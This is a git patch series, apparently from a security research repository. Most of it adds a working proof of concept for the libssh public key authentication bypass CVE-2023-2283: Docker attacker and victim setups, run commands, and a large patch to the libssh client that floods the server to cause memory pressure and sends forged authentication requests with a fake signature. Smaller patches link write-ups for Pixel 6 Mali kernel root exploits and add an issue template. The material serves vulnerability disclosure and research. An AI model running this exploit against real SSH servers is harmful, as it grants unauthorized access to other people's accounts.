+++ b/SecurityExploits/Android/Mali/GHSL-2023-005/README.md
@@ -1,6 +1,6 @@
## Exploit for GHSL-2023-005
-The write up can be found [here](). A security patch from the upstream Arm Mali driver somehow got missed out in the update for the Pixel phones and I reported it to Google in January 2023. The bug can be used to gain arbitrary kernel code execution from the untrusted app domain, which is then used to disable SELinux and gain root.
+The write up can be found [here](https://github.blog/2023-04-06-pwning-pixel-6-with-a-leftover-patch). A security patch from the upstream Arm Mali driver somehow got missed out in the update for the Pixel phones and I reported it to Google in January 2023. The bug can be used to gain arbitrary kernel code execution from the untrusted app domain, which is then used to disable SELinux and gain root.
The exploit is tested on the Google Pixel 6 for devices running the January 2023 patch. For reference, I used the following command to compile it with clang in ndk-21:
From 63ba211eb8113bbed9694e68c3e0e85dc9f39104 Mon Sep 17 00:00:00 2001
From: Xavier RENE-CORAIL
Date: Sat, 15 Apr 2023 01:38:46 +0000
Subject: [PATCH 11/53] Create issue template for the wall of fame
---
.github/ISSUE_TEMPLATE/wall-of-fame.yml | 59 +++++++++++++++++++++++++
1 file changed, 59 insertions(+)
create mode 100644 .github/ISSUE_TEMPLATE/wall-of-fame.yml
diff --git a/.github/ISSUE_TEMPLATE/wall-of-fame.yml b/.github/ISSUE_TEMPLATE/wall-of-fame.yml
new file mode 100644
index 0000000..326a408
--- /dev/null
+++ b/.github/ISSUE_TEMPLATE/wall-of-fame.yml
@@ -0,0 +1,59 @@
+name: CodeQL Wall of Fame submission
+description: Propose an entry to the CodeQL Wall of Fame (https://securitylab.github.com/codeql-wall-of-fame)
+title: "[wall-of-fame]: "
+labels: [wall-of-fame]
+body:
+ - type: markdown
+ attributes:
+ value: |
+ # Welcome!
+
+ Thank you for submitting an entry for the CodeQL Wall of Fame!
+
+ # Details
+ - type: input
+ id: date
+ attributes:
+ label: Date
+ description: Publication date of the blog post, in YYYY-MM-DD format
+ placeholder: |
+ ex. 2023-01-01
+ validations:
+ required: true
+ - type: input
+ id: title
+ attributes:
+ label: Title
+ description: Title of the blog post
+ validations:
+ required: true
+ - type: input
+ id: author
+ attributes:
+ label: Author
+ description: Author of the blog post
+ validations:
+ required: true
+ - type: input
+ id: url
+ attributes:
+ label: URL
+ description: URL of the blog post
+ validations:
+ required: true
+ - type: input
+ id: cve
+ attributes:
+ label: CVE
+ description: CVE ID(s), comma separated
+ placeholder: |
+ ex. CVE-2023-0001, CVE-2023-0002
+ validations:
+ required: true
+ - type: textarea
+ id: description
+ attributes:
+ label: description
+ description: Short summary of the blog post
+ validations:
+ required: true
From fc8e70fbf6bb652e8526408c1dbeb12fefcc1367 Mon Sep 17 00:00:00 2001
From: Xavier RENE-CORAIL
Date: Mon, 17 Apr 2023 20:26:30 -0700
Subject: [PATCH 12/53] Typo - missing capitalization
---
.github/ISSUE_TEMPLATE/wall-of-fame.yml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/.github/ISSUE_TEMPLATE/wall-of-fame.yml b/.github/ISSUE_TEMPLATE/wall-of-fame.yml
index 326a408..0489ed0 100644
--- a/.github/ISSUE_TEMPLATE/wall-of-fame.yml
+++ b/.github/ISSUE_TEMPLATE/wall-of-fame.yml
@@ -53,7 +53,7 @@ body:
- type: textarea
id: description
attributes:
- label: description
+ label: Description
description: Short summary of the blog post
validations:
required: true
From 319b5ad6a8b2305046a0646a91c63e58a08932f5 Mon Sep 17 00:00:00 2001
From: Man Yue Mo
Date: Wed, 24 May 2023 10:40:12 +0100
Subject: [PATCH 13/53] Add link
---
SecurityExploits/Android/Mali/CVE_2022_46395/README.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/SecurityExploits/Android/Mali/CVE_2022_46395/README.md b/SecurityExploits/Android/Mali/CVE_2022_46395/README.md
index 6cafc1a..c16225f 100644
--- a/SecurityExploits/Android/Mali/CVE_2022_46395/README.md
+++ b/SecurityExploits/Android/Mali/CVE_2022_46395/README.md
@@ -1,6 +1,6 @@
## Exploit for CVE-2022-46395
-The write up can be found [here](). This is a bug in the Arm Mali kernel driver that I reported in November 2022. The bug can be used to gain arbitrary kernel code execution from the untrusted app domain, which is then used to disable SELinux and gain root.
+The write up can be found [here](https://github.blog/2023-05-25-rooting-with-root-cause-finding-a-variant-of-a-project-zero-bug). This is a bug in the Arm Mali kernel driver that I reported in November 2022. The bug can be used to gain arbitrary kernel code execution from the untrusted app domain, which is then used to disable SELinux and gain root.
The exploit is tested on the Google Pixel 6 with the November 2022 and January 2023 patch. For reference, I used the following command to compile with clang in ndk-21:
From 79b4e6fa9729d1e61d839dd60d01eeabbc72d8f4 Mon Sep 17 00:00:00 2001
From: Kevin Backhouse
Date: Wed, 7 Jun 2023 12:38:20 +0100
Subject: [PATCH 14/53] PoC for libssh CVE-2023-2283
---
.../README.md | 104 +++++
.../attacker/Dockerfile | 35 ++
.../attacker/home/.bash_history | 1 +
.../attacker/home/.tmux.conf | 11 +
.../attacker/home/diff.txt | 399 ++++++++++++++++++
.../attacker/home/id_ed25519.pub | 1 +
.../attacker/home/id_rsa.pub | 1 +
.../server/Dockerfile | 35 ++
.../server/home/.bash_history | 5 +
.../server/home/.ssh/authorized_keys | 1 +
.../server/home/.ssh/id_ed25519.pub | 1 +
.../server/home/.ssh/id_rsa.pub | 1 +
.../server/home/.tmux.conf | 11 +
13 files changed, 606 insertions(+)
create mode 100644 SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/README.md
create mode 100644 SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/Dockerfile
create mode 100644 SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/.bash_history
create mode 100644 SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/.tmux.conf
create mode 100644 SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/diff.txt
create mode 100644 SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/id_ed25519.pub
create mode 100644 SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/id_rsa.pub
create mode 100644 SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/Dockerfile
create mode 100644 SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.bash_history
create mode 100644 SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.ssh/authorized_keys
create mode 100644 SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.ssh/id_ed25519.pub
create mode 100644 SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.ssh/id_rsa.pub
create mode 100644 SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.tmux.conf
diff --git a/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/README.md b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/README.md
new file mode 100644
index 0000000..6cfb209
--- /dev/null
+++ b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/README.md
@@ -0,0 +1,104 @@
+# Public key authentication bypass in libssh (CVE-2023-2283)
+
+[CVE-2023-2283](https://securitylab.github.com/advisories/GHSL-2023-085_libssh/)
+is an authentication bypass vulnerability in
+[libssh](https://www.libssh.org/), which, under certain conditions, may
+enable a remote attacker to gain unauthorized access to another user’s
+account via ssh login.
+
+This demo uses docker to simulate two computers, named "libssh-server"
+and "libssh-attacker". On libssh-server, we run `ssh_server_pthread`,
+which is a simple ssh server application that is [included as an
+example](https://gitlab.com/libssh/libssh-mirror/-/blob/e8322817a9e5aaef0698d779ddd467a209a85d85/examples/ssh_server.c)
+with the libssh source code. The server is configured to allow public
+key authentication with an ED25519 key, but the attacker does not know the
+private key. The attacker instead authenticates by triggering the vulnerability.
+
+The vulnerability is triggered when `ssh_server_pthread` hits an
+out-of-memory condition at precisely the right moment. If libssh is
+running on a 64-bit server with plenty of RAM then it is very unlikely
+that an attacker will be able to generate enough memory pressure to
+cause an out-of-memory error, which means that the vulnerability is
+unlikely to be exploitable. The goal of this demo is, instead, to show
+that the vulnerability is exploitable if libssh is running in a
+memory-constrained environment such as a [memory-constrained
+container](https://docs.docker.com/config/containers/resource_constraints/),
+which we believe is a realistic scenario for a real-life libssh deployment.
+The demo uses `ulimit` to set a 256MB memory limit on the ssh server.
+
+## Network setup
+
+Create a docker network bridge, to simulate a network with two separate computers.
+
+```
+docker network create -d bridge --subnet 172.18.0.0/16 libssh-demo-network
+```
+
+## Server setup
+
+Build the docker image:
+
+```
+docker build server -t libssh-server --build-arg UID=`id -u`
+```
+
+Start the container:
+
+```
+docker run --rm --network libssh-demo-network --ip=172.18.0.10 -it libssh-server
+```
+
+If you want to be able to debug the libssh server, then you need to start the container with some extra command line arguments:
+
+```
+docker run --rm --network libssh-demo-network --ip=172.18.0.10 --cap-add=SYS_PTRACE --security-opt seccomp=unconfined -it libssh-server
+```
+
+Inside the container, run these commands to create ssh keys for the server:
+
+```
+mkdir ~/testkeys
+ssh-keygen -P "" -t ecdsa -f ~/testkeys/id_ecdsa
+ssh-keygen -P "" -t rsa -f ~/testkeys/id_rsa
+```
+
+Start the server:
+
+```
+ulimit -v 262144 # 256MB
+~/libssh/build/examples/ssh_server_pthread -p 2022 -r ~/testkeys/id_rsa -e ~/testkeys/id_ecdsa -a ~/.ssh/authorized_keys 0.0.0.0
+```
+
+Note: ssh servers normally listen on port 22, but root privileges are required to listen on 22, so this demo uses port 2022 instead. Use `sudo` if you want to change the port number to 22. The `sudo` password in this docker container is "x".
+
+## Attacker setup
+
+Build the docker image:
+
+```
+docker build attacker -t libssh-attacker --build-arg UID=`id -u`
+```
+
+Start the container:
+
+```
+docker run --rm --network libssh-demo-network --ip=172.18.0.11 -it libssh-attacker
+```
+
+If you want to be able to debug the client, then you need to start the container with some extra command line arguments:
+
+```
+docker run --rm --network libssh-demo-network --ip=172.18.0.11 --cap-add=SYS_PTRACE --security-opt seccomp=unconfined -it libssh-attacker
+```
+
+The attacker uses a modified version of libssh. The modifications are in the file named `diff.txt` and are applied during the `docker build` step.
+
+Run the malicious client like this:
+
+```
+~/libssh/build/examples/ssh-client -p 2022 victim@172.18.0.10 ~/id_ed25519.pub
+```
+
+The vulnerability is triggered when the ssh server has an out-of-memory error at the exact right moment, which means that the PoC is unreliable. It runs in a loop until it's successful, which can often take several minutes. You may also need to run several instances of the PoC simultaneously to generate enough memory pressure on the server. I suggest using `tmux` to open three terminals and start 3 instances of the PoC. When one of the PoCs succeeds, it creates a file named "success.txt", which notifies the other instances that they should stop.
+
+Note: the PoC sometimes accidentally triggers a SIGSEGV in the server due to an unrelated [null-pointer dereference bug](https://gitlab.com/libssh/libssh-mirror/-/merge_requests/381). If this happens, you will need to restart the `ssh_server_pthread` process.
diff --git a/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/Dockerfile b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/Dockerfile
new file mode 100644
index 0000000..21837c6
--- /dev/null
+++ b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/Dockerfile
@@ -0,0 +1,35 @@
+FROM ubuntu:22.04
+
+ENV DEBIAN_FRONTEND=noninteractive
+
+RUN apt-get update && \
+ apt-get install -y \
+ sudo tmux emacs git gdb cmake build-essential net-tools psmisc \
+ libssl-dev zlib1g-dev libkrb5-dev libkrb5-dbg
+
+ARG UID=1000
+
+# Create a non-root user account to run libssh.
+RUN adduser attacker --disabled-password --uid $UID
+
+# Grant the 'attacker' user sudo access. This is not used for the demo,
+# but it is often handy for installing extra packages.
+RUN adduser attacker sudo
+RUN echo "attacker:x" | chpasswd
+COPY home/ /home/attacker/
+RUN chown -R attacker:attacker /home/attacker
+
+# Switch over to the 'attacker' user, since root access is no longer required
+USER attacker
+WORKDIR /home/attacker
+
+# Clone and build libssh v0.10.4
+RUN git clone https://git.libssh.org/projects/libssh.git && \
+ cd libssh && \
+ git checkout e8322817a9e5aaef0698d779ddd467a209a85d85 && \
+ git apply ~/diff.txt && \
+ mkdir build && cd build && \
+ cmake .. && \
+ make -j $(nproc)
+
+USER attacker
diff --git a/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/.bash_history b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/.bash_history
new file mode 100644
index 0000000..5df6160
--- /dev/null
+++ b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/.bash_history
@@ -0,0 +1 @@
+~/libssh/build/examples/ssh-client -p 2022 victim@172.18.0.10 ~/id_ed25519.pub
diff --git a/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/.tmux.conf b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/.tmux.conf
new file mode 100644
index 0000000..f2da785
--- /dev/null
+++ b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/.tmux.conf
@@ -0,0 +1,11 @@
+# Enable 256 colors
+set -g default-terminal "screen-256color"
+
+# Enable using the mouse to switch windows.
+set -g mouse on
+
+# Don't lose track of SSH_AGENT etc. from parent environment.
+set -g update-environment -r
+
+# history buffer size
+set-option -g history-limit 100000
diff --git a/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/diff.txt b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/diff.txt
new file mode 100644
index 0000000..c56191d
--- /dev/null
+++ b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/diff.txt
@@ -0,0 +1,399 @@
+diff --git a/examples/ssh_client.c b/examples/ssh_client.c
+index aaf0cb5b..4055a2c5 100644
+--- a/examples/ssh_client.c
++++ b/examples/ssh_client.c
+@@ -32,10 +32,12 @@
+ #include
+ #endif
+
++#include
+ #include
+ #include
+ #include
+ #include
++#include
+
+ #include
+ #include
+@@ -47,6 +49,7 @@
+
+ static char *host = NULL;
+ static char *user = NULL;
++static char *pubkey_filename = NULL;
+ static char *cmds[MAXCMD];
+ static char *config_file = NULL;
+ static struct termios terminal;
+@@ -89,7 +92,7 @@ static void add_cmd(char *cmd)
+ static void usage(void)
+ {
+ fprintf(stderr,
+- "Usage : ssh [options] [login@]hostname\n"
++ "Usage : ssh [options] [login@]hostname pubkey_file\n"
+ "sample client - libssh-%s\n"
+ "Options :\n"
+ " -l user : log in as user\n"
+@@ -134,12 +137,15 @@ static int opts(int argc, char **argv)
+ if (optind < argc) {
+ host = argv[optind++];
+ }
++ if (optind < argc) {
++ pubkey_filename = argv[optind++];
++ }
+
+ while(optind < argc) {
+ add_cmd(argv[optind++]);
+ }
+
+- if (host == NULL) {
++ if (host == NULL || pubkey_filename == NULL) {
+ return -1;
+ }
+
+@@ -321,12 +327,27 @@ static void batch_shell(ssh_session session)
+ ssh_channel_free(channel);
+ }
+
+-static int client(ssh_session session)
++static void kill_procs(const int nprocs, pid_t *cpids) {
++ int i;
++ for (i = 0; i+1 < nprocs; i++) {
++ const pid_t cpid = cpids[i];
++ if (cpid > 0) {
++ cpids[i] = -1;
++ kill(cpid, SIGTERM);
++ waitpid(cpid, 0, 0);
++ }
++ }
++}
++
++static int client(ssh_session session, const int myid, const int nprocs, pid_t *cpids)
+ {
+- int auth = 0;
+ char *banner;
+ int state;
++ int result;
+
++ if (ssh_options_set(session, SSH_OPTIONS_COMPRESSION_C_S, "zlib") < 0) {
++ return -1;
++ }
+ if (user) {
+ if (ssh_options_set(session, SSH_OPTIONS_USER, user) < 0) {
+ return -1;
+@@ -352,6 +373,7 @@ static int client(ssh_session session)
+ fprintf(stderr, "Connection failed : %s\n", ssh_get_error(session));
+ return -1;
+ }
++ printf("connection successful: %d\n", myid);
+
+ state = verify_knownhost(session);
+ if (state != 0) {
+@@ -364,16 +386,21 @@ static int client(ssh_session session)
+ printf("%s\n", banner);
+ free(banner);
+ }
+- auth = authenticate_console(session);
+- if (auth != SSH_AUTH_SUCCESS) {
++ result = ssh_bypass_auth(session, pubkey_filename, myid, nprocs);
++ if (myid == 0) {
++ kill_procs(nprocs, cpids);
++ }
++ if (result < 0) {
+ return -1;
++ } else {
++ // Write a file named success.txt
++ close(open("success.txt", O_WRONLY | O_CREAT, S_IRUSR | S_IWUSR));
+ }
+ if (cmds[0] == NULL) {
+ shell(session);
+ } else {
+ batch_shell(session);
+ }
+-
+ return 0;
+ }
+
+@@ -406,9 +433,48 @@ static void cleanup_pcap(void)
+ pcap = NULL;
+ }
+
+-int main(int argc, char **argv)
++static int run(int argc, char **argv)
+ {
+ ssh_session session;
++ pid_t cpids[5];
++ int result;
++
++ // Fork a few times to increase the amount of memory pressure on the server.
++ const int nprocs = 1 + (rand() % (1 + sizeof(cpids)/sizeof(cpids[0])));
++ int myid;
++ printf("nprocs = %d\n", nprocs);
++ for (myid = 1; myid < nprocs; myid++) {
++ struct timespec tm = {0};
++ pid_t cpid = fork();
++ if (cpid < 0) {
++ const int err = errno;
++ fprintf(stderr, "fork failed: %s\n", strerror(err));
++ exit(EXIT_FAILURE);
++ } else if (cpid == 0) {
++ break;
++ }
++
++ cpids[myid-1] = cpid;
++ // Short delay between each fork so that they don't all try to connect
++ // at once.
++ tm.tv_nsec = 1000000000L / 10;
++ nanosleep(&tm, 0);
++ }
++ if (myid == nprocs) {
++ myid = 0;
++ } else {
++ // Suppress output in the forks
++ const int stdin_new = open("/dev/null", O_RDONLY);
++ const int stdout_new = open("/dev/null", O_RDONLY);
++ const int stderr_new = open("/dev/null", O_RDONLY);
++ dup2(stdin_new, STDIN_FILENO);
++ dup2(stdout_new, STDOUT_FILENO);
++ dup2(stderr_new, STDERR_FILENO);
++ close(stdin_new);
++ close(stdout_new);
++ close(stderr_new);
++ }
++ printf("fork id %d\n", myid);
+
+ ssh_init();
+ session = ssh_new();
+@@ -427,7 +493,10 @@ int main(int argc, char **argv)
+ signal(SIGTERM, do_exit);
+
+ set_pcap(session);
+- client(session);
++ result = client(session, myid, nprocs, cpids);
++ if (myid == 0) {
++ kill_procs(nprocs, cpids);
++ }
+
+ ssh_disconnect(session);
+ ssh_free(session);
+@@ -435,5 +504,36 @@ int main(int argc, char **argv)
+
+ ssh_finalize();
+
+- return 0;
++ return result;
++}
++
++int main(int argc, char **argv)
++{
++ // Keep restarting the process until it's successful.
++ while (1) {
++ const pid_t cpid = fork();
++ if (cpid == 0) {
++ break;
++ } else if (cpid > 0) {
++ int wstatus = 0;
++ waitpid(cpid, &wstatus, 0);
++ if (WEXITSTATUS(wstatus) == EXIT_SUCCESS) {
++ return EXIT_SUCCESS;
++ }
++ } else {
++ return EXIT_FAILURE;
++ }
++ }
++
++ if (open("success.txt", O_RDONLY) >= 0) {
++ printf("Stopping because a file named success.txt was found.\n");
++ return EXIT_SUCCESS;
++ }
++
++ srand(time(0));
++ if (run(argc, argv) == 0) {
++ return EXIT_SUCCESS;
++ } else {
++ return EXIT_FAILURE;
++ }
+ }
+diff --git a/include/libssh/libssh.h b/include/libssh/libssh.h
+index 7857a77b..e79da840 100644
+--- a/include/libssh/libssh.h
++++ b/include/libssh/libssh.h
+@@ -508,6 +508,9 @@ LIBSSH_API void ssh_disconnect(ssh_session session);
+ LIBSSH_API char *ssh_dirname (const char *path);
+ LIBSSH_API int ssh_finalize(void);
+
++LIBSSH_API int ssh_bypass_auth(ssh_session session, const char* pubkey_filename, const int myid, const int nprocs);
++
++
+ /* REVERSE PORT FORWARDING */
+ LIBSSH_API ssh_channel ssh_channel_open_forward_port(ssh_session session,
+ int timeout_ms,
+diff --git a/src/client.c b/src/client.c
+index a35a28e1..e2facc4a 100644
+--- a/src/client.c
++++ b/src/client.c
+@@ -24,6 +24,7 @@
+ #include "config.h"
+
+ #include
++#include
+
+ #ifndef _WIN32
+ #include
+@@ -46,6 +47,7 @@
+ #include "libssh/misc.h"
+ #include "libssh/pki.h"
+ #include "libssh/kex.h"
++#include "libssh/string.h"
+
+ #define set_status(session, status) do {\
+ if (session->common.callbacks && session->common.callbacks->connect_status_function) \
+@@ -834,6 +836,138 @@ error:
+ }
+ }
+
++static int send_service_request(ssh_session session, ssh_string str, bool set_wontblock) {
++ ssh_buffer_pack(session->out_buffer, "bS", SSH2_MSG_SERVICE_REQUEST, str);
++ if (set_wontblock) {
++ ssh_socket_set_write_wontblock(session->socket);
++ }
++ if (ssh_packet_send(session) == SSH_ERROR) {
++ ssh_set_error(session, SSH_FATAL,
++ "Sending SSH2_MSG_UNIMPLEMENTED failed.");
++ printf("Sending SSH2_MSG_UNIMPLEMENTED failed.\n");
++ return -1;
++ }
++ return 0;
++}
++
++int ssh_bypass_auth(ssh_session session, const char *pubkey_filename, const int myid, const int nprocs) {
++ struct ssh_crypto_struct *crypto = ssh_packet_get_current_crypto(session, SSH_DIRECTION_BOTH);
++ size_t i, n;
++ int rc;
++ int result = -1;
++
++ if (myid > 0) {
++ size_t sizes[5] = {0x40000 - 5, 0x40000 - 5, 0x40000 - 5, 0x4000 - 5, 0xf00 - 5};
++ ssh_string str;
++ sleep(1);
++ assert(myid <= sizeof(sizes)/sizeof(sizes[0]));
++ const size_t slen = sizes[myid-1];
++ printf("slen = %lx\n", slen);
++ str = ssh_string_new(slen);
++ // note: ssh_string has a length field, so you don't have to nul-terminate them.
++ memset(ssh_string_data(str), 'x', slen);
++ for (i = 0; i < 192; i++) {
++ if (send_service_request(session, str, i >= 0) < 0) {
++ return result;
++ }
++ }
++ ssh_string_free(str);
++ pause();
++ } else {
++ const char *sig_type_c = NULL;
++ ssh_key pubkey = NULL;
++ ssh_string pubkey_s = NULL;
++
++ ssh_pki_import_pubkey_file(pubkey_filename, &pubkey);
++ ssh_pki_export_pubkey_blob(pubkey, &pubkey_s);
++
++ sig_type_c = ssh_key_get_signature_algorithm(session, pubkey->type);
++ printf("sig_type_c = %s\n", sig_type_c);
++ sleep(2);
++ for (i = 0; i < 100 && result < 0; i++) {
++ ssh_string username;
++ ssh_string service;
++ ssh_string algo;
++
++ // 0x37 is the maximum string length that will fit in an 0x40-sized malloc chunk.
++ username = ssh_string_new(0x37 + i * 0x400);
++ memset(ssh_string_data(username), 0, ssh_string_len(username));
++ if (ssh_string_fill(username, session->opts.username, strlen(session->opts.username)) < 0) {
++ printf("username is too long: %s\n", session->opts.username);
++ return result;
++ }
++ service = ssh_string_new(0x37 + i * 0x500);
++ memset(ssh_string_data(service), 0, ssh_string_len(service));
++ ssh_string_fill(service, "ssh-connection", 15);
++ algo = ssh_string_new(1);
++ memset(ssh_string_data(algo), 'x', ssh_string_len(algo));
++ printf("send userauth 0\n");
++ ssh_buffer_pack(session->out_buffer, "bSSsbSS",
++ SSH2_MSG_USERAUTH_REQUEST,
++ username,
++ service,
++ "publickey",
++ 1, /* private key */
++ algo,
++ pubkey_s /* public key */
++ );
++ ssh_string_free(username);
++ ssh_string_free(service);
++ ssh_string_free(algo);
++
++ ssh_string fakesig = ssh_string_new(90 /*i == 0 ? 400 : 0x400 * i*/);
++ memset(ssh_string_data(fakesig), 'x', ssh_string_len(fakesig));
++ ssh_string sigtype = ssh_string_from_char(sig_type_c);
++ size_t sigtypelen = ssh_string_len(sigtype) + sizeof(uint32_t);
++ ssh_string payload = ssh_string_new(ED25519_SIG_LEN);
++ memcpy(ssh_string_data(payload), "kevwozere", 10);
++ size_t payloadlen = ssh_string_len(payload) + sizeof(uint32_t);
++ assert(sigtypelen + payloadlen <= ssh_string_len(fakesig));
++ memcpy(ssh_string_data(fakesig), sigtype, sigtypelen);
++ memcpy((char*)ssh_string_data(fakesig) + sigtypelen, payload, payloadlen);
++ ssh_string_free(sigtype);
++ ssh_string_free(payload);
++ ssh_buffer_pack(session->out_buffer, "S", fakesig);
++ ssh_string_free(fakesig);
++ session->auth.service_state = SSH_AUTH_SERVICE_SENT;
++ session->auth.current_method = SSH_AUTH_METHOD_PUBLICKEY;
++ session->auth.state = SSH_AUTH_STATE_PUBKEY_AUTH_SENT;
++ session->pending_call_state = SSH_PENDING_CALL_AUTH_PUBKEY;
++
++ printf("out_buf size: %x\n", ssh_buffer_get_len(session->out_buffer));
++ if (ssh_packet_send(session) == SSH_ERROR) {
++ ssh_set_error(session, SSH_FATAL,
++ "Sending SSH2_MSG_UNIMPLEMENTED failed.");
++ return result;
++ }
++ printf("send userauth 1\n");
++
++ // If the userauth message was unsuccessful then we don't get
++ // a reply from the server. So we send a short service request
++ // message, which will get a reply. Then we can tell from
++ // which type of reply we receive whether the userauth was
++ // successful.
++ {
++ ssh_string str = ssh_string_from_char("x");
++ if (send_service_request(session, str, true) < 0) {
++ return result;
++ }
++ ssh_string_free(str);
++ }
++
++ rc=ssh_handle_packets_termination(session,SSH_TIMEOUT_USER,
++ ssh_service_request_termination, session);
++ printf("rc = %d\n", rc);
++ if (session->auth.state == SSH_AUTH_STATE_SUCCESS) {
++ result = 0;
++ }
++ }
++ ssh_string_free(pubkey_s);
++ ssh_key_free(pubkey);
++ }
++ return result;
++}
++
+ const char *ssh_copyright(void)
+ {
+ return SSH_STRINGIFY(LIBSSH_VERSION) " (c) 2003-2022 "
+diff --git a/src/libssh.map b/src/libssh.map
+index eeb625c5..f20d89b9 100644
+--- a/src/libssh.map
++++ b/src/libssh.map
+@@ -188,6 +188,7 @@ LIBSSH_4_5_0 # Released
+ ssh_connector_set_out_channel;
+ ssh_connector_set_out_fd;
+ ssh_copyright;
++ ssh_bypass_auth;
+ ssh_dirname;
+ ssh_disconnect;
+ ssh_dump_knownhost;
diff --git a/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/id_ed25519.pub b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/id_ed25519.pub
new file mode 100644
index 0000000..1ecefa0
--- /dev/null
+++ b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/id_ed25519.pub
@@ -0,0 +1 @@
+ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDG8eH3ZcBaTcwg/Gclb+ZYWZRQh9RvHQnQNY/lIa8mW victim@b1b586610139
diff --git a/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/id_rsa.pub b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/id_rsa.pub
new file mode 100644
index 0000000..7efed1a
--- /dev/null
+++ b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/id_rsa.pub
@@ -0,0 +1 @@
+ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDVIGdVtCjMEzzbewMED01wAqaBcU6HytjUJoZt9Cm3lS0C691ZPayL14aj5uC9H73JDAabl58IEy6k++Wb5ryp74pozZ/H3swAuJlBidbeAUjtQbM5cxBT9hO7XE9YdHTXLzmVSF2NzyTt2HSZJPpYKsh0k7O56kfk/DfrIU7qGcIoDTNgK8zErXN2CjQ0dqm/sDZP1rxfHOfvLvTKx3WA30ko9c+zrIEJZ9pHV/OALOxPHf4WDewsMH3g1nG52hei2NG6r8nLP4BSEKcTbrebI6/RKOfXaFROMN01g9SY6Y0XmG0vAsyyRw0+oJMKAaoYgtokfBbJUJRtZ3uFavcA1DGRYn1Kswbwg+ZWMYoPRTTJ/Hzl8DqViWUOdsu9kHm24orPJZEajAo6kvjEjUQj2CKMbUVbxYB54S+taSXDhbeYWx1hACN/L8FufLdtW2veeuUOKJ0MtOMRCu5uCvLI7Y2wI6xxGa3jHOap81jyNa1vuMYfkk1z3jk5Ol5rlKE= victim@b1b586610139
diff --git a/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/Dockerfile b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/Dockerfile
new file mode 100644
index 0000000..97d50ea
--- /dev/null
+++ b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/Dockerfile
@@ -0,0 +1,35 @@
+FROM ubuntu:22.04
+
+ENV DEBIAN_FRONTEND=noninteractive
+
+RUN apt-get update && \
+ apt-get install -y \
+ sudo tmux emacs git gdb cmake build-essential net-tools psmisc \
+ libssl-dev zlib1g-dev libkrb5-dev libkrb5-dbg \
+ libc6-dbg
+
+ARG UID=1000
+
+# Create a non-root user account to run libssh.
+RUN adduser victim --disabled-password --uid $UID
+
+# Grant the 'victim' user sudo access. This is not used for the demo,
+# but it is often handy for installing extra packages.
+RUN adduser victim sudo
+RUN echo "victim:x" | chpasswd
+COPY home/ /home/victim/
+RUN chown -R victim:victim /home/victim
+
+# Switch over to the 'victim' user, since root access is no longer required
+USER victim
+WORKDIR /home/victim
+
+# Clone and build libssh v0.10.4
+RUN git clone https://git.libssh.org/projects/libssh.git && \
+ cd libssh && \
+ git checkout e8322817a9e5aaef0698d779ddd467a209a85d85 && \
+ mkdir build && cd build && \
+ cmake .. && \
+ make -j $(nproc)
+
+USER victim
diff --git a/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.bash_history b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.bash_history
new file mode 100644
index 0000000..d291675
--- /dev/null
+++ b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.bash_history
@@ -0,0 +1,5 @@
+mkdir ~/testkeys
+ssh-keygen -P "" -t ecdsa -f ~/testkeys/id_ecdsa
+ssh-keygen -P "" -t rsa -f ~/testkeys/id_rsa
+ulimit -v 262144
+~/libssh/build/examples/ssh_server_pthread -p 2022 -r ~/testkeys/id_rsa -e ~/testkeys/id_ecdsa -a ~/.ssh/authorized_keys 0.0.0.0
